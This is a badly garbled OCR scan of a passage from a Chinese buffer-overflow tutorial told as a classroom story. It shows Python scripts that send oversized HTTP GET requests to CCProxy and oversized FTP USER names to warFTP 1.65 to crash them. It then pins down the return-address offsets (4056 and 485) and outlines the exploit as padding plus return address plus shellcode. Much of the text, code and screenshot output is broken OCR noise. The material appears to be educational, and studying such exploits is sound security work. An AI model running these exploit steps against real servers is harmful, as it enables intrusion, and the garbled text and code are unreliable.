“是 啊 ! 所 以 如 果 我 们 现在 写 一 个 z= 二 a 十 b 的 程序 并 开始 证 明 其 正确 性 ， 那 么 就 要 等 到 200 亿 年 
之 后 才能 宣布 。200 亿 年 ?宇宙 可 能 都 不 存在 了 1” 


“哈哈 ! 是 啊 1 ”大 家 都 笑 了 起 来 。 


“而 且 测 试 不 仅 要 考虑 测试 合法 的 输入 ， 还 要 考虑 非法 的 可 能 输入 。 所 以 理论 上 ， 测 试 情况 应 
该 有 无 穷 多 个 ! 只 用 把 这 无 穷 多 个 都 测试 完毕 了 ， 我 们 才能 证 明 某 个 软件 是 正确 的 ! 所 以 ， 
测试 不 是 为 了 证 明 软 件 是 正确 的 ， 因 为 我 们 无 法 证 明 ， 而 是 为 了 尽 可 能 的 发 现 迄 今 为 止 没有 
发 现 的 漏洞 1 ” 


“ 哦 | » 


"BEDA, ARERIA AERA, БЕШ ЕРГЕ РЫН ЛП] A, ë m, EP] BE Z ОЕ 
He o" 


小 知识 : 


ex | 试 方法 主要 有 等 价 | = 类 划分 、 边 值 分 析 、 [Х| Ж ЕЁ, 错 错误 推测 等 


等 价 类 划分 : 把 所 有 可 能 的 输入 数据 划分 成 知 干 部 分 〈 子 集 ) ， 然 后 从 每 一 个 子 集 中 选取 少 
数 县 有 代表 性 的 数据 作为 测试 用 例 。 


边界 值 分 析 : 因为 大 量 的 错误 是 发 生 在 输入 或 输出 范 围 的 边界 上 ， 而 不 是 发 生 在 输入 输出 沁 
围 的 内 部 ， 因 此 ， 针 对 各 种 边界 情况 设计 测试 用 例 ， 可 以 查 出 更 多 的 错误 。 


因果 图 方法 : 考虑 输入 条 件 之 间 的 联系 、 相 互 组 合 等 。 采 用 一 种 适合 于 摘 述 对 于 多 种 条 件 的 
组 合 ， 相 应 产生 多 个 动作 的 形 陈 来 考虑 设计 测试 用 例 ， 这 融 是 因果 图 (逻辑 模型 ) 。 


比如， 我 们 要 对 CCProxy 义 理 HTTP 协 议 的 部 分 进行 黑 盒 测试 ， 融 可 以 对 HTTP 协 议 进 行 分 
X. 对 协议 的 每 一 个 字段 分 多 | 测试 长度 要 求 的 最 小 值 和 最 大 值 ， 或 按 一 定 的 比例 增加 测试 字 
符 串 的 KEE, 3 3 E mh S+ BXFH EP NJ 测 | 试用 例 发 现 漏洞 。” 


“I | » 


“而 对 于 黑 盒 测试 来 说 ， 首 选 是 使 用 Python 语言 


7.2.2 Python ij T 


“Python 是 种 脚本 语言 。 使 用 简单 ， 但 功能 很 强大 ， 特 别 是 构造 测试 用 字符 串 时 很 方便 ; 而 且 
集成 了 很 多 现成 的 应 用 协议 ， 使 用 Python 测 试 ， 很 容易 发 现 漏洞 。” 


小 知识 : Жа 


脚本 语言 是 类 似 DOS 批 处 理 、UNIX Shell 程 序 的 语言 。 上 脚本 语言 不 需要 每 次 编译 再 执行 ， 并 
且 在 执行 中 可 很 容易 地 访问 正在 运行 的 程序 ， 甚 至 可 动态 修改 正在 运行 的 程序 ， 适 用 于 快速 
开发 以 及 完成 一 些 简 单 任务 。 解 决 问题 需要 诸如 可 变 长 度 字 符 串 等 数据 类 型 ， 这 样 的 数据 类 
型 在 脚本 语言 中 十 分 容易 ， 而 C 语 言 则 需要 很 多 工作 才能 实现 。 


“哎哟 ， 第 一 次 听 说 ， 还 什么 都 不 懂 ， 怎 公测 试 啊 ? "古风 说 道 。 


“呵呵 ， 大 家 有 了 C 语 言 的 基础 ， 使 用 Python 简 下 是 轻松 之 极 。 我 们 先 来 安 委 吧 | ERR 
Python 和 pyOpenSSL。 在 Windows 环 境 下 ， 当 然 安 儿 Windows 有 版 本 的 Python 了 ， 推 荐 安 闭 
Python 2.2.x 的 版 本 ， 因 为 可 以 找到 For бонке 比较 方便 。 当 然 我 们 
也 可 目 己 编译 成 for Win 版 ， 安 疼 过 程 如 图 7-9、 图 7-10。 


Installing 


Copying Python Documentation [HT ML]: 
D:SPTHON22*3D ocsapisunicodeD bjects. html 














Qha d TR PCS HUS 


pyOpenSSL-0.5.1 


Thi мга wil stall PIDE E оп pour computa, Clics Мех їс comnue or 
Lancel bo est Ee Setup w 


Highleve wrapper alourid a subset al the pens 5L Ibray. includes 
SOL Connechan objects, марраъ the methods of Гун portable 


оске! 
* L'allbackz wien in Python 
х Enlcnareo ситет handing mocharim, mironng DoomS S'e сиге cados 


— and much mere ;] 
PYTHON 
Pouered Mahar Hai esci а AB Strat 
email гпапш нак 
Descinton Python wrapper ЖШ around Ње Орепо 51 Ibuu 
пег! 


UETA ia d sourceforga. wet; 
version 0 


Ви Thu Jun Ж 22:15 04 2003 with distutib- 1.0.3 





“安装 完毕 后 ， 我 们 任意 新 建 一 个 文件 ， 改 成 .py 后 级 名 ， 可 以 看 见 为 py 文件 变 为 了 一 个 蟒蛇 图 
标 ， 如 图 7-11， 说 明 Python 安 痿 成 功 。” 


“hoho ! 图 标 好 可 爱 啊 ! "小 倩 等 几 个 女生 说 道 。 


“ 虽 ， 但 其 实 和 蟒蛇 无 关 ， 命 名 是 由 BBC 的 'Monty Python's Flying Circus' 节 目 而 得 。 不 过 使 用 
起 来 ， 大 家 会 感到 它 的 确 比 较 可 爱 。” 
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LUE 相关 
ТҮРЕ) нң) “Бу Ци А) ТА (Т) AEH 


Q=- O- 8 prer хня E- 
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= ССркоху. py | 
Ë: 安全 资料 Python File 
由 [D 或 防 研 究 : 
日 p mx 
[DD ТСРІР 
(С) w 
(c 随机 信号 
日 O Hi 
E [C book 
由 [C 04-022 
(E 11.8 
(С) Ms03-032Em£ 
(С) Mzü3-D43Mezsage 
由 (С) 沾 用 的 草稿 
(С) 226 
С) — Windows P she11co desa: 
(СС) ТЕЕ ЗҺе11Сойей Е 
日 O ile ЕЁ 
3 *RX 
O Ztelnet/e[l Em 
(c Г шїн 
(С) RENIA 
(С) 五 ShellFods 变 形 大 法 
(С) —Windews ЕЇ ЕЁ 0 
由 2) 整理 后 
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“ЖИП ка & JF EmA Python2.2—Python (command line)， 就 可 进入 Python 的 解释 
程序 界面 ， 如 图 7-12。” 


帮助 和 支持 QD @) 绝世 好 简历 5.0 Г 





298 c) 腾讯 g › | тик Python вл) 
MAD. © 天 克 证 券 网 上 交易 系统 » B] на. Does 













uu | (m) RICE MAIZ 3.0 M | Fython (command line) 
GB w D... (m) CCProxy d ё] Python Manuals 















Python 2.2 y Uninstall Python 


хий We 








“ 进 入 解释 程序 的 环境 后 ， 解 释 程序 处 于 交互 状态 。 在 这 种 状态 下 ， 系 统 提 示 输 入 下 一 个 命 
D, X _ 舰 是 三 个 大 于 符号 (Вр>>>) , “is Lac Esas Windows hS Conto, 
u ше s 如 图 7-13。 


OZ NA | 
— a Bs ЛГ < Д 
Г.2 ‚2 Py t П IÑ О! | 19) J | ITI 


“credits” or “License” tor more information- 





“我 们 来 看 一 个 简单 例子 ， 看 看 怎么 使 用 。” 

“Hello World ? "大 家 都 知道 一 般 的 入 门 是 写 个 Hello World 程 序 。 
老病 一 本 正经 的 说 :“ 不 ， 这 个 太 简 单 了 ， 我 们 输出 'Hello，ww0830' 吧 1” 
“Z | Т ШШШ!” 


呵呵， 你 们 也 可 改 成 自己 的 名 字 啊 ! 当 看 到 自己 的 名 字 成 功 打 印 出 来 时 ， 就 会 感到 很 有 成 就 
感 ， 更 能 鼓励 自己 1 Python 在 输入 提示 符 人 >>>' 下 时 ， 是 工作 在 交互 模式 。 输 入 命令 融会 马上 
执行 ， 然 后 又 会 等 待 输 入 下 一 条 执行 。 我 们 输入 print 'hello ww0830! ' ， 融 会 马上 打出 来 ， 如 
图 7-14。” 





- |n] x 

2, Мау ЗИ 20803, 18:12:B85 [MSCG 32 bit <Intel)l] on win32 ^ 
"copuright". "credits" or "license" for more information. 

222 print 'hello wwH83H*' 

hello ww883B' 

5») 





“该 交互 模式 可 用 于 测试 短小 语句 的 执行 效果 ; 也 可 测试 较 大 系统 中 的 部 分 组 件 。 但 缺点 是 不 
能 保存 这 些 指 仿 ， 如 果 要 反复 输入 时 也 比较 麻烦 。 所 以 ， 我 们 可 用 文本 编辑 器 编辑 命 分， 然 
后 存 为 py 后 级 名 的 文件 。 以 后 束 可 以 一 让 使 用 了 。” 


“我 们 打开 记事 本 ， 输 入 如 下 命令 :” 


import sys 
print sys.argv 


“然后 另存 为 test.py。 这 两 句 指令 输 出 该 py 文件 执行 时 带 的 参数 。 我 们 在 DOS 提 示 符 下 运行 ， 
结果 如 图 7-15。” 











ZEE CR 88.110] KART 6143 KATH DES 4 


F:“ test.py ҮТҮ: Жк: -o abc 
L ET UL , "`-—1 EE IUS TS , ` 


F: s> 


其实，Python 最 方便 的 地 方 ， 一 个 是 构造 字符 串 ， 另 一 个 是 本 身 已 经 封 莹 好 了 很 多 网 络 协 
议 ， 我 们 可 和 站 接 使 用 它 来 探测 软件 对 网 络 协议 的 处 理 ， 以 期 望 发 现 漏洞 。” 


“好 了 ， 介 绍 就 到 这 里 。 我 们 实际 用 Python 来 写 网 络 协议 的 测试 用 例 吧 1” 
"Nj! Python 的 网 络 编程 还 不 是 很 了 解 呢 ! ”古风 担心 的 说 道 。 


“ 没 天 系 ， 我 会 给 出 详细 解释 的 。 而 且 有 了 C 语 言 编 写 网 络 程序 的 基础 ， 你 们 会 发 现 用 Python 
的 确 很 可 爱 。 但 关键 的 ， 还 是 要 明白 思路 。” 


7.2.3 实例 一 Python 探测 CCProxy 漏 洞 
“我 们 用 Python 来 对 刚才 讲解 的 CCProxy 漏 洞 进行 探测 和 定位 。” 


刚才 使 用 VC 编程 进行 探测 时 ， 构 造 超 长 字符 串 很 及 烦 ， | 又 要 连接 。 但 我 
们 用 Python 写 一 个 探测 CCproxy 漏 洞 的 程序 则 非常 简 单 ， 只 需 下 面 四 句 。 


>>> import httplib 

>>> conn = httplib.HTTPConnection("192.168.3.151:808") 
>>> a = 'A'*4080 

>>>conn.request("GET",a) 


“A, 192.168.3.151 EBSCCProxyHBzt f, ALIR HEA 7-16, mhigE0x4141414129 па f Е 
数 返 回 点 。 测 试 完 成 ^C 


ССРгоху Nicrosoft EFC Application 


BE 
AppName: ccproxy. ехе ÁppVer: 2.0.0.1 ModName: unknown 
ModVer: 0.0.0.0 Offset: 41414141 


IR EHVEERIR B 


这 个 悄 吝 报 肖 包括: 回 题 出 现时 CCProxy Microsoft МЕС lication КЕНЕ А ; 正在 使 


用 的 操作 系统 版 本 及 计算 机 生 件 ; BRE EE E E ORE 


ШОТ ЙИШ Internet [hA 
DE E NES. НЕШ. FH-PBBCEHRUEREUE ATERATA Yams B. ЇН 
» ти HI Be El EXE HI 8 Е , ЗО BITTTTOCIERUS ЕШ. iw fe АН НЕН ТЕНЕ 
85515 ; IB3D3E B im ESSET. > 则 个 会 使 用 这 个 入 息 。 
IP SERS dE de HH eene. SDAEOH АЕ E.B F , 2136 118 Xl] 


pfi. iX атк tu Ee HH SE НО ДЕ ВЕЕ Е), ТЕЕ ЕАР А Е, CIE 
JE TI EH TIDEMBI . 


SSUBCTHBPdREBUHEGMER, BILE 
要 查看 web 上 的 数据 收集 策略 ， EEH. 





“ШШЩ ^? 3x mfg fg? "КаК — 2, АЦА А, “用 Python 写 测 试 程序 太 容 易 了 吧 ! ” 
“了 呵呵， 是 的 ， 如 图 7-17。” 


| jJ Python (command line) 





Python 2.2.3 <H42, Мау ЈИ 2080343, ETT 12:H8» LMSC 32 hit TPPA IT on win 32 
Type "help". "copyright", "credits" or "license" for more information. 
»»» import httplib 

>>> conn = ҺЕЕр11Ь.НІТРСоппесёліоп < "192.168 .3.151 :808 "2 

>>> а = 'й' —40880 

>>> сопп. кедицехё < "СЕТ", а> 

22» 





“解释 一 下 图 7-17， 第 一 句 'import httplib' 是 加 载 http 协 议 包 ，Python 封 外 了 很 多 协议 包 ， 我 们 
直接 使 用 就 可 以 了 ; 第 二 句 'conn = httplib.HTTPConnection("192.168.3.151:808") 就 是 使 用 
协议 包 里 面 的 函数 ， 连 接 目标 机 192.168.3.151 的 808 端 口 ; 第 三 句 'a = 'A'4080 94384080 K E 
的 么 炭 和 与 变量 a， 这 是 脚本 的 优势 ， 下 接 用 ? 融 可 构造 指定 长 度 的 字符 串 ; 最 后 一 名 

хе СОПП.гГедце51("СЕТ",а)', 即 把 字符 串 a 作 为 http 的 get А ЖК Ж Sit Z. 


“进一步 ， 我 们 用 Python 定位 千 位 ， 只 要 发 送 如 下 字符 串 融 可 以 了 。 


import httplib 

conn = httplib.HTTPConnection("192.168.3.151:808") 
S = 'A'*1000-'B'*1000-'C'*1000-'D'*1000-'E'*80 
conn.request("GET", s) 


“报错 对 话 框 显示 为 Offset: 45454545 ， 说 明 千 位 是 0x45-0x41 = 4, 17-18. 


ССРгоху Nicrosoft EFC Application 


ÁppName: сергоху. ехе DI ` £. U. U. ModName: unknown 
MadVer: 0.0.0.0 | Ü££set: 45454545 
иа =. 
六 个 错误 报 肖 包括 : 可 题 出 现时 end Microsoft МЕС TEN n 的 状态 信息 ; 


正在 使 
AOE EEEE КЕНЕ ЗШЕ í Product ID, Ù FAREA ; 
ELE НТ ЙИП Internet 协议 (IP) 地 址 


for - 


ПОЕ ЕЕ. MES ҢЫ. ДЕГЕНИНГ SEI hk 
IR a RI BEES ER ER.: ЭПЖ BITTEXTERUSTIS 


BB 
的 身份 ， (BIDS BOE ET, 则 个 会 使 用 这 个 共 息 。 


РП 用 于 解决 问题 。 如 果 有 其 地 信息 可 
ек. кш EIS E LEES РАЈНЕ), ENER 


要 查看 关于 错误 报 肖 的 技术 信息 ， 
ESE web 上 的 数据 收集 第 略 ， 





“依次 类 推 ， 我 们 可 以 定位 十 位 ， 束 是 4000 个 A， 然 后 10 个 A，10 个 B，10 个 C. 程序 如 
下 


import httplib 

conn = httplib.HTTPConnection("192.168.3.151:808") 

S = 'A'*4000+A'*10+'B'*10+'C'*10+'D'*10+'E'*10+'F'*10+'J'*10+'H'*10 
conn.request("GET", s) 


“报错 对 话 框 显示 为 Offset: 46464646 ， 说 明 十 位 是 0x46-0x41 = 5, ” 


“最 后 定位 个 位 。 是 在 4050 个 A 后 ， 输 入 A 到 J 十 个 字符 ， 程 序 如 下 : " 


import httplib 

conn = httplib.HTTPConnection("192.168.3.151:808") 
S = 'A'*4000-A'*50- ' ABCDEFGHIJ' 
conn.request("GET",s) 


“这 次 报错 对 话 框 显示 为 Offset: 47474747 ， 说 明 个 位 是 0x47-0x41 = 6, REREH, m 
是 4000 十 50 十 6 二 4056， 定 位 完成 1” 


“有 了 返回 点 ， 攻 击 利 用 程 厚 的 编写 也 很 简单 ， 把 各 个 字符 串 段 用 ' 十 ' 号 连 起 来 珊 OK 了 。 攻 击 
程序 参看 CCProxy.py (36% 915%) 。 我 们 测试 ， 也 成 功 1” 


"EE | 实在 是 太 快 、 太 方便 了 ， 融 跟 方 便 面 一 样 ! " 玉 波 说 道 。 


呵呵， 是 啊 1 Python 既 有 脚本 语言 构造 字符 串 的 优势 ， 又 有 很 多 现成 的 网 络 协议 包 可 以 使 
用 ， 所 以 黑 盒 测试 是 Exploit 编 写 的 必 备 民 药 1” 


“还 有 许多 使 用 Python 语言 探测 漏洞 的 自动 工具 和 方法 。” 老 病 说 道 , “推荐 使 用 fusserpy 程 
序 ， 它 可 对 SMTP、FTP、POP3 服 务 器 进行 自动 检测 。” 


老病 介绍 完 后 说 道 ,，“ 我 给 大 家 布置 一 个 作业 ， 用 fusser.py 检 查 warFTP1.6 的 漏洞 ， 并 试 着 分 
析 一 下 利用 方法 和 漏洞 的 成 因 。Ok ?今天 就 到 这 里 ， 放 学 1” 


7.2.4 Python 探测 warFTP 漏 洞 
小 强 日 记 之 五 
11 月 29 日 阴 


今天 ， 老 炳 布置 了 作业 ， 涉 及 漏洞 的 利用 和 分 析 。 我 一 点 也 不 敢 懈 仿 。 下 课 后 告别 小 倩 回 到 
家 中 ， 匆 匆 吃 完 饭 后 就 坐 在 电脑 前 看 老病 推荐 的 Fusser。 


在 网 站 上 下 载 了 一 个 Fusser 1.0 ( 光 意 也 有 收录 ) , BREMA Max fuzzerpy ， 束 会 给 
使 用 帮助 信息 ， 即 主机 IP、 端 口 、 探 测 协 议 。 如 图 7-19。 


ZEE ГА BH lll КУБУ C143 KAE Ti 4 


IK NS [Ж МББ Ж IHINPuthon N£uzzer-i .8s£uzzer-1.80»fuzzer.py 
HHHHHHHHHHHHHHHHHHHHHHHHTHHHHHHHHHHHHHH 
ni Het-Twister Fuzzer Module H 
H Coded by Sergio 'shadoun' Àlvarez # 
HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHIHHHH 
: K: вун X isa] H TNPython be host? port» < 
protocol» 
protocols available: smtp. ftp, pop3 


K: xir Dt МҮШ ДӘ Tie NPuthon M uzzer-i -H5ħfuzzer-1. Р 





我 环 麻 如 何 利用 它 进 行 自动 探测 呢 ? 想 了 想 ， 不 如 把 warFTP 安 装 好 ， 直 接 测 试 ! 


再 下 载 了 一 个 warFTP 1.6 版 本 (光盘 有 上 收录) ， 安 装 后 其 界面 如 图 7-20。 同 样 简洁 明了 ， 但 
没有 CCProxy 那 样 规 沁 ， 有 点 随意 化 。 


Q 版 缓冲 区 浴 出 教程 


“А OFFLINE — WAR-FTPD 1.65 
Properties View Help ` 


Z| 115191 ole | eise [| e || >] K 





[ Ho anonymous login 


Max 区 Anon. fo — | 


IP number and port 


[192. 188. 3. 151 





[S 2004 11 30 00:57] WAR-FIPD 1.65 Copyright (c) 1996, 1997 by jeaa. WIN32 (NT) 


i i = === 





输入 fuzzer.py 192.168.3.151 21 ftp ， 党 试看 测试 一 下 FTP 协 议 ， 哇 ! — РДЕ Н 211 
3B 7 : Bug found， 如 图 7-21。 自 动 化 就 是 好 啊 | 
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OE 


К: УУ E TE NP ython N£uzzer-1 .ON£uzzer-1.80»fuzzer.py 192.168.3.151 21 ftp 
€*»here fuzziny begins [ftpl&*5 

[+] Keys del protocolo: [人 conmm PEE banner’, * proto’ ] 

[+] Protocol family: tcp 


[+] Recu Banner: ON 
[+] Gommands 
<< Z22H8— Juyaa's Fan Glub FIP Service VHR-PIPD 1.65 Ready 
220 Please enter your user name. 





>> USER АЙАЯАЯАЯАЯАЯАААААЯААААААААААААЯАЯААААААААААААААААААААЙЯАЯА 
ЗЕРТ 
THBPHREBRBEBPBPEEPBRPEBPPEERPBREBPBPPRPBPBEBBPEREPBPREPRPBREBRPEPRPREBBRBREDEBRPEPPEPRBEBRBEDBRPPEPRPEPBPREBRPBREBREPBRBEITIT 
"IPUPERPRPEPPPREPEPPPPPEPPPPPPePPEPPERPPPPPPPPPPPPEPPPPPEPPPEPPPPEPPEPPPPEPPEPPEPPPPRPEPPEPTTSTSS 
үүнү ТТ ЙТ ТҮТТҮ ТТТ ТТТ, ТТТ ТТ ТНТ үтү 
ППААААААААААААААЙААЙААЙАЙАЙААААААААААЙААААААААААААААААААААЙАЙААААААЙАААААААААААААЙАЯА 
HRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRPRRRRRRRRRRRRRRRRRRRRPRRRRRPRRRRRRRRPRRRRRRRRRRHRRHR 
"ThDBPRPREBRBEBBPEPBPEPPEPRPBEPBPEEBPEBBEPRPEPPEREBRPREBRPBEPRPREBEBREDBBPEPPEPPBEPBRBEDBRPRPEPRPEPBPEBRPBREBRPBIREIBIIT 
"IhHRSPERPEPEPPREPPRPPERPPPÉRPPPPPRPÉEPEREPRPPRPPPPEPPPRPRPEPRPEPPEPEPPPPEPPEPPEPPRPPERPPEPPERPPRPRPRPRIPSPEIPTITESITSSS 
ППААААААААААААААААААЙААЙААААААААААААЙААААААААААААААААААААЙААААААААААААААААААААЯААА 
JnBBBEBEBBEBBBBRBBDBBEBREÉBRBRBEREBRHRBDERBEBBREBRBRBRRBERBEBBERBEBEBRBEBBEBDRBREBBBEBRBEBBEÉRBBEBRBIS 
"DBPBRERBEBBEEPPEPRPEPBPREBPBPEREBPBBERPÜPPEREPPEDPRPEREDPRPBEPRPBPEPREDBEPRPEEPPEPPREDBRBEDBRPPEPPEPPUEPERPBREBRPBPBEDBIBIT 
АПАААААААААААААААААЯ 

<< 331 User name okay, Need password. 


Couldn't connect ТСР socket 

<**> Bug found??? 399) €=) 

—> Sending: USER АЙЯАААААЯААААААААААЙААААААААЙААААААААЙААААААААААААЯАААААЯАААААЙААЯА 
TDBDPBBRBERPREPEPBEPPEPPEPRPPEPEBREBBPBEPBEPEPPEPRUEPRPPPBPPREBRBPBPEEPEPEPPEPRERPEPRPEBREBREPRPEPEBPBEPPEPPBRPEBRISITSIE 
"CU'DPPPPEPPPEPPPPPPPPPPPPPPPPPPPEPPPPPRPPPPPPPPPRPPPPPEPPEPPPPPRPPPPPPPEPPPPPPPPPPPRIPTTITSESIT 
АПАПААААЯААААААААААААААААААААААААААААААААААААААААААААААААЯАААААААААААААААЯААЯАЯА 
ПППАЙААААААААААААЙАААЙАААААААААААААААААААААААЙАААААЙАААААЙАААААААААААААААЙААЙААЙЯАЙА 
HRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRR`RR`RRRPRRRRPR`RRRRRR`PRPRPRRRPRRRRR`RRRRRR`RRRPRRRR[`PR`PRHRRRHRRHH 
"UPPPPREPEPPEPPEPPEPPPPPEPEPREPPPPEPEPPPUPPRPPPPPEPEPREPPEPPEPPEPPPRPPRPEPPEPRPEPEPPPPPEPUEPRPPBRPEITSSE 
"PHPPPERPPPEPPRPPPPPRPPPPPREPRPPPPEPEPEPPPPPRPPRPPPEPEPPRPPRPPPEPEPPPPEPRPEPRPPPRPEPPRPPPERPPERPPEPPPERIPSTOESEE 
ДДД Г Т ЛД Т ГЛ Г ДД Т И Т Т ЛТ И Л Т Л И ИД Т И И Т I) 
ПД Т И ИД А И ШИ Т ДТ Т И ИИ И И И И ИШ ИТИ Т И И ТИПШ Л ТИ ИД И И А И: 
IBBBRBRBERBBBREBEBBERBEBREBBBBERBRERBEBBREBREBRBERBBEÉBRBBHEBBPRBEBREBBERBBÉBRBBRBREREBREBRBEBBREDBI 
"PhREBPREBPRPEPEPBEPRDEPRPEPBPEPEBBPBREBEDPEDPEDPBEPRPEPBRPPPRPPREBRBBEBPEPEPPEPREPRPEPRBEBPRBBREPBEDBPEPPEPRPREPRPBRISISIE 
ППААЙАЙААЯАААААААААААЙААААААААААААААААААЙААЙААААААЛААЙАААААЙААААААААААЙАААААААЙААЯЯАЯЯА 
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根据 提示 ， 看 来 是 处 理 User 名 的 时 候 有 浴 出 问题 ! 于 是 边 回 忆 老 证 讲 的 内 容 ， 边 用 Python 构 
造 字符 串 实现 定位 。 看 了 看 Python 的 帮助 ， 自 己 试 着 写 了 个 FTP 协 议 的 探测 程序 。 首 先 加 载 
FTP 协 议 包 ， 然 后 连 授 FTP， 发 送 超 长 的 用 户 名 ， 程 序 如 下 : 


from ftplib import FTP 
ftp = FTP('192.168.3.151') 
ftp.login( 'A'*500,'ww') 


哈哈 ， 一 下 子 融 成 功 了 ! warFTP 没 有 反应 ， 挂 摊 了 。 如 老病 所 说 ， 有 了 一 门 语言 的 基础 ， 对 
比 学 习 另 一 门 语言 ， 是 个 很 快 的 过 程 。 


看 来 500 个 字 节 的 用 户 名 实现 了 瀹 出 ， 但 没有 出 错 对 话 杠 弹出， 所 以 要 用 OllyDbg 来 帮助 定 
位 。 我 先 重新 启动 WarFtp， 表 用 Ollydbg 加 载 程序 。 如 图 7-22 和 图 7-23。 
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WIE Yie Debug Plugins Üptions Window Help 


Altti 


1 D:XServ-lAS егт aemon. exe Ctrl*F2 
2 C: WINDOWS*explorer. exe 

3 Е: Study BA SC EE rp MMS04-028JPEGAS ASE E ЕВУ РП dl kernel32. dll 

4 Е: аду РЕНТА ФС wWso4-o028JPEGS ETE ERU FERIA spo] 11 *GdiFlus. 411 

5 F:XStudy IE EB RS Ф: wso4-078]TPEGSS 6 o ПЕДА ерове) 1 ntdll. 411 


select process to attach 








|| rundll3Z arelHelper.CHS C: xIIMDONS«sustem3z-rundllz2.eaxse 
S| Rundl [32 CnsHain : "s WIHMHDOUS"SSvusStenm3e"sRundl 152. ене 
аййййг 38 services Ci INDONS" systen32 services. ене 
аййййг 14 sms sSustemRootsSŠustem32%snss,evue 
|| spoalsu CixIIMDOUS«sustemiz-spoolsu.ese 
suchost : «IJINDOlUS*suztema2-suchost.eaue 
4| svchost C: -WIMNDONMS*Suystemaz-suchost.ese 
| suchost C: WINDOWS Sy stenã3nsuchost. ене 
suchost C: xIIMDOlUS«Suystemiz-suchost.exe 
svchost Се MWIHDONS*Sustema3z-suchost.eaue 
96959846 | SunpaSuo D: sHodunF ireljal I%sSumPRSuc, ене 
абар? 14| umnat Cs*“WINOOWS“ System3e2“ nnat ,eHe 
1| umnetdhep Се xIHMDONUS«Sustemiz-vmnetdhcp,.ese 
unmware-authd :UHluared,BU-.vmuare-authd.ese 
99596094FC Lad Symantec AntiVirus kk Ef C:*Proaram Files*Sumantec Client. 
вевевсвв( war—f tpd | Idle - UBR-FTPD 1.65 D:ar-ftpd*war-ftpd.eaue 
Default IME D: “Шіпамрчыіпамра. ехе | 
loe HetDDE Agent sep: IIINDONS«sustema3Sz-winloaon. 
56666544| WINWORD вн D:*Mierosoft Office*DFf ice INWOR м 





重新 执行 刚才 的 程序 ， 这 下 Ollydbg 截 获 了 异常 141414141 不 能 执行 ， 就 是 我 们 发 送 的 字符 
串 。 如 图 7-24。 
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=m 
重启 warFTP， 我 发 现 只 需 用 “Debug” 菜 单 下 的 “Restart* 就 可 重新 启动 并 加 载 程 序 了 ， 而 且 加 
的 注释 也 不 会 又 失 ， 如 图 7-25。 这 下 方便 多 了 | 


Access violation when executing [41414141 F7/F8/F9 to pass exception to program 





OllyDbg 一 war-ftpd. exe — [CPU — thread 00000рЕ0] 





[C] File View PASTI Plugins Options Window Help 








Restart Ctr1+F2 


一 不 小 心 就 发 现 了 一 个 小 技巧 ， 我 暗自 得 意 了 一 会 儿 ， 然 后 就 考虑 定位 了 。 


经 过 这 学 期 的 学 习 ， 定 位 的 方法 我 已 经 牢 牢 掌握 了 。 首 先 定位 百 位 ，ABCDE 各 占 100， 和 程序 
如 下 : 


7.2.4 Python 探测 warFTP 漏 洞 354 





from ftplib import FTP 

ftp = FTP('192.168.3.151') 

S = 'A'*100 + 'В'*100+'С'*100+'0'*100+'Е'*100 
ftp.login( s,'ww') 


Ollydbg 截 获 异常 ， 如 图 7 一 26。 


ABEEFESC| 13 01 00 00 43 ГЕ 00 00 20 28 SB 01 F4 4A ЗА Ва !0..C". Ti: . 
АЙЕ 3BFERC ta 4R 3A ай ай Ba ae па 40 a2 дӣ en 81 ea ae aa mg:..... .66..0 


TE Wa DAL 


тина viciation when executing [45454545] - use Shift«F7/F 8/F3 to pass exception to program 


0х454545457 RET, 0х455 “Е”, Е-А=4, 8124002 #7 Ehk = sao 


百 位 是 4， 青 定位 十 位 。 先 是 400 个 A， 然 后 在 ABCD...……. 各 发 10 个 ， 程 序 如 下 : 


from ftplib import FTP 

ftp = FTP('192.168.3.151') 

S = '"A'*400 А 10 + "B 10+ CC ТОЕ р "ТОЕ E ТОЕ Е: ТОБ ^10*- H' "10- T *10* J'*30 
ftp.login( s,'ww') 


这 次 是 49 到 达 返 回 点 ， 如 图 7 一 27。49 一 41 二 8， 就 是 80 多 。 


[AE рү БГ 
RESTE го БЕ 
5 140158 P| 66 БЕ 


55 20| 74 68 65 2B|Please give the 
60| 65 20 62 65|report a name be 


ИН | tors saving 





Access violation when executing [49494949]. use ShiftsF7/F8/F9 to pass exception to program 


最 后 一 次 ， 定 位 个 位 。 先 是 480 个 A， 然 后 是 ”ABCDEFGHIJ"， 程 序 如 下 : 


from ftplib import FTP 

ftp = ЕТР('192.168.3.151') 

S = 'A'*400 +'A'*80+ 'ABCDEFGHIJ' 
ftp.login( s,'ww') 


这 次 是 46474849 到 达 返 回 点 ， 截 获 的 图 如 图 7 一 28。 


B0446120| 45 78 63 65 70 74 69 6F БЕ 20 54 79 ?8 65 DB ВВ Exception Type.. 
ag448128|58 6С 65 61 73 65 20 6? 69 76 65 20 74 68 65 20| Please give the 
008440140 re 65 Zü 6F re 74 20 61 20 БЕ 61 6D 65 2B 62 65|report a name be 
йй 4481568 66 БЕ r2 65 20 73 61 re 63 CE 6r zE Өй a8 ай ag fore saving наван 


=== vicio wi when executing [49484746] - use e Shift+F7/F8/F9 to pass exception t to program 


所 以 个 位 是 0x46 一 0x41 二 5。400 十 80 十 5 二 485 ! 我 们 把 485 的 地 方 改 为 BBBB， 其 余 全 为 
AAAA， 检 验 一 下 。 


from ftplib import FTP 
ftp = ЕТР('192.168.3.151') 
s = 'A'*485 -'BBBB'*'AAAA' 
ftp.login( s,'ww') 


测试 ， 果 然 是 42424242 报 错 ! 22 TATE AE u y HH =a | 


然后 区 考虑 利用 了 ， 构 造 是 : USER A*485 + RET + ShellCode 


在 Python 中 ， 





41414141 
BIBEB1C9 
EBC24R8E 
S8SC?48ED 
SBFe9?2F 
EICFDSH? 
BGBHAF rér 
2BF31ESD 
BBE4ASBSED 
1Р2Е1228 
C?2HF9EF 
abeBeLcrnF 


B53202899 
2г463053 
1Р954С76 
220539546 
FERHSBO42 
RB4857R22 
BBEGGBEF 


РЕЕА4512 
ББЕВЇ гЗ 
B6374F66 
RR43F667 
1IFF3F267 
DES8F7R1 
BH435;6H 
BBS9F4239 
ЕСЭЭЭГБА 
5618595B8 
rFüUc21C66 
44šE3H2F 


BBB22DS6 
B391C757 
B79138533 
EB865125 
Gr63EFSF 
E1C32842 
FBEGSSEB 


?403EEDS 
EBSSL2l1L 
САНЕ97Ә1 
CasB9?E 
4Ca22D9H 
35D6381H 
GBe31LD?7H 
BEC214R4 
BB43B?ED 
EBCS31C8H 
56Cc21C67 
